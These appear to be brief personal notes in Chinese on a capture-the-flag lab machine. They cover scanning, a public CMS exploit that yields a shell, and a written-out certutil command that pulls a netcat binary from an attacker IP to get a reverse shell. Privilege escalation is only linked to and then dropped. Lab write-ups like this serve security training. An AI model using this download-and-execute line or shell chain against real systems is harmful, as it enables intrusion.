nmap
dirsearch
看到CMS框架
bing一下
https://www.exploit-db.com/exploits/48506
down下来执行就拿到shell了。。
但是在这个shell下执行certutil.exe -urlcache -split -f http://10.10.14.35/443m.exe c:/Users/Public/443m.exe
下载nc时总是报错,折腾了很久都没成功,最后没办法在上面的代码文件里写句子了,
终于拿到反弹shell了
提权:
参考
https://hackingwebservice.wordpress.com/2020/07/29/hackthebox-walkthrough-buff-machine/
https://www.youtube.com/watch?v=z5zY0UBmRsw
参考上面两个链接,个人这儿plink转发时出错,貌似是因为ssh加密协议问题,考虑解决这个可能会大折腾而且这台机器提权是针对Cloudme这个国外应用,貌似没有通用学习和利用价值,不往下折腾了 。
